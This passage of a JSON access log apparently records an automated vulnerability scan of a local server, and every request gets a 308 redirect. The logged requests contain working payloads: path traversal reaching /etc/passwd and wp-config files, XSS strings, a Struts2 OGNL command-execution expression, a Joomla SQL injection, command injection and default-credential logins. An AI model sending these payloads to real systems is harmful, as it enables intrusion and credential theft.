/wls-wsat/CoordinatorPortType HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.666","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://%2f%2f.example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /debug/pprof/goroutine?debug=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.358","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.393","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /qvisdvr/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.408","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.vm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.362","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.434","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/vpn.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.310","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/61 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.417","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.418","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.422","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /editor_tools/module?type=files/admin\x22>¶ms=filetype=images HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://%3F.example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.098","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=0776a6f87a8143af12c1e7bbd0bf4197 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.373","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sitecore/login/default.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/62 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.429","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.405","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.319","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.348","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://%5c%5c.example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.302","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config-backup.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.223","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.455","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?view=log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=dff1db99c9ecc3c645a4239e20e8ba32 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.308","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/projects HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.children....4.2.1....json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.912","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.507","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"username=jovyan&password=jupyter","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.212","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /' HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.807","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.439","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.442","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/warn.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://%5cexample.com@ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.444","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php.save HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.442","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webapp/?fccc%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.345","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"Language_S=../../Data/CONFIG/CasDbCnn.dat","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /casmain.xgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.136","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /kb_view_customer.do?sysparm_article=KB00xxxx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dashboard.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.394","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /zm/?view=log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.421","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.334","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.422","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.144","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 